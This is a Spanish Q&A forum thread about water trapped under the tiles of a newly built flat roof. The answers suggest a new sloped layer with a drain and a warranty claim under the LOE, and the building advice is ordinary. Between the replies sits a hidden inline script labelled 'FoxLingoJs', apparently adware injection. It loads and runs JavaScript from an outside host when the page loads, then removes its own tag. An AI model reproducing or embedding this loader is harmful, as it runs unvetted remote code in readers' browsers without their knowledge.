Evacuación del agua en una cubierta plana transitable.

El problema se plantea con la salida del agua que se acumula entre la impermeabilización y las baldosas, pues esta ha empezado a salir por las paredes tanto por dentro como por fuera de la casa. En la cubierta no hay ningún sumidero, solo se pusieron los canalones al final de la terraza para la recogida del agua ¿Qué solución es la mejor para que el agua que se embalsa se evacue sin producir daños?
Mar

1 Respuesta

Respuesta

Haría falta ver la configuración de la terraza, pero quizás se podría plantear construir sobre lo existente un nuevo faldón con una pendiente adecuada y que conduzca el agua hacía donde la queremos evacuar, disponiendo un nuevo sumidero y conectando éste bien con un bajante o bien darle salida mediante un bajante externo hacía el exterior.

Este nuevo faldón sería un añadido sobre el actual, por lo que quedaría espacio para el nuevo sumidero, además si la edificación no es muy antigua esto no supondría apenas nada de peso.

Saludos, espero que se solucionen sus problemas, si tiene alguna duda quedo as su disposición.

Gracias por la respuesta, pero me olvide comentar que la terraza es de reciente construcción .

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();// ]]></script>

Pues la verdad ese problema se puede deber a un fallo de diseño de la cubierta o a una mala ejecución.

Una cubierta plano no debe retener el agua, ésta se debe evacuar rápidamente, si se producen encharcamientos por falta de pendiente o por falta de sumideros es muy normal que se pueda filtrar el agua por algún fallo de la impermeabilización.

Lo mejor sería reclamar la inspección de los técnicos que han proyectado la cubierta y que ellos propongan su solución junto con la empresa constructora (siempre que esté dentro de plazo de garantía LOE).

Estas gestiones la suelen realizar el administrador de la comunidad, siendo él el que se ponga en contacto con dichos técnicos.